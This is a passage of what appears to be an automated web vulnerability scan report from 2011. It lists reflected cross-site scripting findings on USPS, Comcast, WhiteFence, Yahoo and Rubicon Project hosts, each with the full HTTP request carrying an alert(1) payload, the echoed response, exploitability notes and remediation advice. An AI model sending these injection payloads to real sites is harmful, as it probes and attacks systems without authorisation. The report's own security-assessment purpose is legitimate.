GET /results.aspx?searchby=&Termsearch=true&Partnerid=BRY-01&Pagesize=0&Pagenumber=1&Portal=Frontier&term=d5b57"style%3d"x%3aexpression(alert(1))"d9518141ec5&city=Dallas&state=TX&zip= HTTP/1.1
Host: yp.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://www.frontierpages.com/region.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cznpages%3D%2526pid%253Dfrontierpages.com/region.asp%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BreturnBusinessSearch%252528%252529%25253B%25257D%2526oidt%253D2%2526ot%253DIMG

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:52:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: userid=e65ce03b-e5b2-4548-b8bf-667efcdf3dc3; expires=Thu, 06-Sep-2012 12:52:29 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17616


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<link href="
...[SNIP]...
<a href = "results.aspx?PageNumber=1&ListingID=&term=d5b57"style="x:expression(alert(1))"d9518141ec5&Address=&city=Dallas&State=TX&zip=&PageSize=25&Radius=50&ecs=true&sort=alpha&Heading=d5b57"style="x:expression(alert(1))"d9518141ec5&listingCount=0">
...[SNIP]...

2.120. http://zip4.usps.com/zip4/zcl_1_results.jsp [state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://zip4.usps.com
Path:   /zip4/zcl_1_results.jsp

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6b649><script>alert(1)</script>6471dcc488fb924b6 was submitted in the state parameter. The response echoes it converted to upper case, as VT6B649><SCRIPT>ALERT(1)</SCRIPT>6471DCC488FB924B6 (see the input element below), not unmodified.

This proof-of-concept attack demonstrates that the attribute context can be escaped: an unquoted value ends at the first whitespace or >, so the payload's > closes the input tag and the <SCRIPT> element that follows is parsed as script, since HTML tag names are case-insensitive. The JavaScript inside it, however, is case-sensitive: ALERT(1) is not alert(1) and raises a ReferenceError rather than running the intended call. Before treating this finding as confirmed, verify execution manually with a payload whose behaviour does not depend on letter case.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /zip4/zcl_1_results.jsp?visited=1&pagenumber=0&city=BARRE&state=VT6b649><script>alert(1)</script>6471dcc488fb924b6&submit.x=0&submit.y=0&submit=Find+ZIP+Code HTTP/1.1
Host: zip4.usps.com
Proxy-Connection: keep-alive
Referer: http://zip4.usps.com/zip4/citytown.jsp
Cache-Control: max-age=0
Origin: http://zip4.usps.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331562506:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html;charset=ISO-8859-1
Cache-Control:
Content-Length: 25869
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:53:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en">
<HEAD>
<title>USPS - ZIP Code Lookup</title>
<met
...[SNIP]...
<input tabindex="2" id="state" style="width:38px;" type="text" maxlength="2" name="state" value=VT6B649><SCRIPT>ALERT(1)</SCRIPT>6471DCC488FB924B6 onKeyPress="return validate_for_characters(this, event)"/>
...[SNIP]...

2.121. http://sitesearch.comcast.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b36d</script><script>alert(1)</script>cf1b4e5a49c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Although the value lands inside a double-quoted JavaScript string, the payload does not need to break out of the quotes: the HTML parser ends the script block at the first </script> regardless of JavaScript string state, and the <script>alert(1)</script> that follows is parsed as a new script element.

Because the reflected data arrives in a request header, this is not trivial to exploit against another user: the attacker needs a way to control the Referer that the victim's browser sends. Historically that was done with client-side plugins such as Flash that could add arbitrary headers to a cross-site request. The header's normal value is the URL of the page the victim came from, so a link or redirect from an attacker-controlled URL also sets it, subject to the browser's referrer policy and to how it percent-encodes characters such as quotes and angle brackets in the URL it sends. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data there. Where it is unavoidable, emit the value as a JSON string literal and additionally escape <, > and & (for example as \u003c, \u003e and \u0026), because the HTML parser ends a script block at </script> regardless of the JavaScript quoting state.

Request

GET /?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}
Referer: http://www.google.com/search?hl=en&q=8b36d</script><script>alert(1)</script>cf1b4e5a49c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:23:27 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18554
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
ch - Version B";
s.events = "event11,event9";
s.eVar41 = "xss";
s.eVar34 = "Comcast.com Search - Version B";
s.prop18 = "xss";
s.prop19 = "http://www.google.com/search?hl=en&q=8b36d</script><script>alert(1)</script>cf1b4e5a49c";
s.pageName = "Search Results - Page 1";
s.eVar31 = s.pageName;
//s.pageName="";

switch ('com') {
case "help":
s.eVar42 = "help support";
brea
...[SNIP]...

2.122. http://www.whitefence.com/category/high-speed-internet/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490cf"><script>alert(1)</script>d506bb2c219 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the reflected data arrives in a request header, this is not trivial to exploit against another user: the attacker needs a way to control the Referer that the victim's browser sends. Historically that was done with client-side plugins such as Flash that could add arbitrary headers to a cross-site request. The header's normal value is the URL of the page the victim came from, so a link or redirect from an attacker-controlled URL also sets it, subject to the browser's referrer policy and to how it percent-encodes characters such as quotes and angle brackets in the URL it sends. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=490cf"><script>alert(1)</script>d506bb2c219
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:30 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=490cf"><script>alert(1)</script>d506bb2c219" />
...[SNIP]...

2.123. http://www.whitefence.com/category/home-phone/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48394"><script>alert(1)</script>f4c68eaa46d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the reflected data arrives in a request header, this is not trivial to exploit against another user: the attacker needs a way to control the Referer that the victim's browser sends. Historically that was done with client-side plugins such as Flash that could add arbitrary headers to a cross-site request. The header's normal value is the URL of the page the victim came from, so a link or redirect from an attacker-controlled URL also sets it, subject to the browser's referrer policy and to how it percent-encodes characters such as quotes and angle brackets in the URL it sends. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=48394"><script>alert(1)</script>f4c68eaa46d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:24 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=48394"><script>alert(1)</script>f4c68eaa46d" />
...[SNIP]...

2.124. http://www.whitefence.com/category/television-service/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5747"><script>alert(1)</script>f6d5090bb1c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the reflected data arrives in a request header, this is not trivial to exploit against another user: the attacker needs a way to control the Referer that the victim's browser sends. Historically that was done with client-side plugins such as Flash that could add arbitrary headers to a cross-site request. The header's normal value is the URL of the page the victim came from, so a link or redirect from an attacker-controlled URL also sets it, subject to the browser's referrer policy and to how it percent-encodes characters such as quotes and angle brackets in the URL it sends. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b5747"><script>alert(1)</script>f6d5090bb1c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:26 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=b5747"><script>alert(1)</script>f6d5090bb1c" />
...[SNIP]...

2.125. http://frontier.my.yahoo.com/ [B cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The value of the B cookie is copied into an HTML comment. The payload f96d6--><script>alert(1)</script>f1539a4397b was submitted in the B cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the data copied into the response is submitted in a cookie, the behaviour is not trivial to exploit against another user: you will typically need a way to set an arbitrary cookie value in the victim's browser first. Bear in mind that cookies scoped to a parent domain (the response below sets its own cookies with domain=my.yahoo.com) are sent to every host beneath that domain, so a script-injection or header-injection flaw on any sibling host is a realistic way to plant a crafted value. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=iif96d6--><script>alert(1)</script>f1539a4397b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE5Mjt9; expires=Fri, 06-Sep-2013 12:29:52 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:52 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=5394529394e6612406d36d0.50699106&s=dVWcpe4RkVkibBSnhXjPDQ--; expires=Mon, 05-Sep-2011 12:29:52 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:52 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171901

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...
<!--
PERF pid[62619]|user[ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=iif96d6--><script>alert(1)</script>f1539a4397b]|t[1315312192]|uri[/]|_rid[QBJmTvV6_Nib9AAADHhqbg..]|PAGE[YES]|UPES[5.8]|UPESF[5.9]|AC_upes[6.4]|AC_contentdb[10.4]|AC_ups[8.3]|coketoday_perf[17.2]|AC_coketoday[24.5]|AC_yql[3.3]|AC_weather[0.4]|coke
...[SNIP]...

2.126. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24732"-alert(1)-"bc24b459e39 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the data copied into the response is submitted in a cookie, the behaviour is not trivial to exploit against another user: you will typically need a way to set an arbitrary cookie value in the victim's browser first. The responses below set their own cookies with domain=.rubiconproject.com, so a ruid cookie planted with that scope from any host beneath the domain would be sent here. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/15925-15.js?cb=0.7626287858001888&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=24732"-alert(1)-"bc24b459e39; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:03 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:46:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^71; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69236; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3162105.js^3^1315313163^1315313163&3142788.js^3^1315313162^1315313163&3147284.js^2^1315313162^1315313162&3142737.js^1^1315313161^1315313161&3172566.js^2^1315313155^1315313160&638177.js^10^1315313155^1315313155&3218925.js^1^1315313155^1315313155; expires=Tue, 13-Sep-2011 12:46:03 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2363

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3162105"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=24732"-alert(1)-"bc24b459e39\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.127. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 565cb"-alert(1)-"ba9a296a288 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/15925-2.js?cb=0.8956789178773761&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=565cb"-alert(1)-"ba9a296a288; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^1; csi2=638178.js^1^1315313134^1315313134&3172565.js^1^1315313133^1315313133; rdk=6348/9844; rdk15=0; ses15=9844^2; csi15=638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:51:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 13:51:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^21; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=68937; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3162106.js^2^1315313462^1315313462&3142787.js^3^1315313461^1315313462&3142736.js^5^1315313454^1315313460&3147282.js^2^1315313454^1315313454&638178.js^5^1315313134^1315313454&3218923.js^1^1315313454^1315313454&3172565.js^2^1315313133^1315313454; expires=Tue, 13-Sep-2011 12:51:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2361

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3162106"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=565cb"-alert(1)-"ba9a296a288\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.128. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c6b4"-alert(1)-"6a907558510 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/16043-15.js?cb=0.7354257416445762&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=9c6b4"-alert(1)-"6a907558510; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:46:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^67; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69237; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
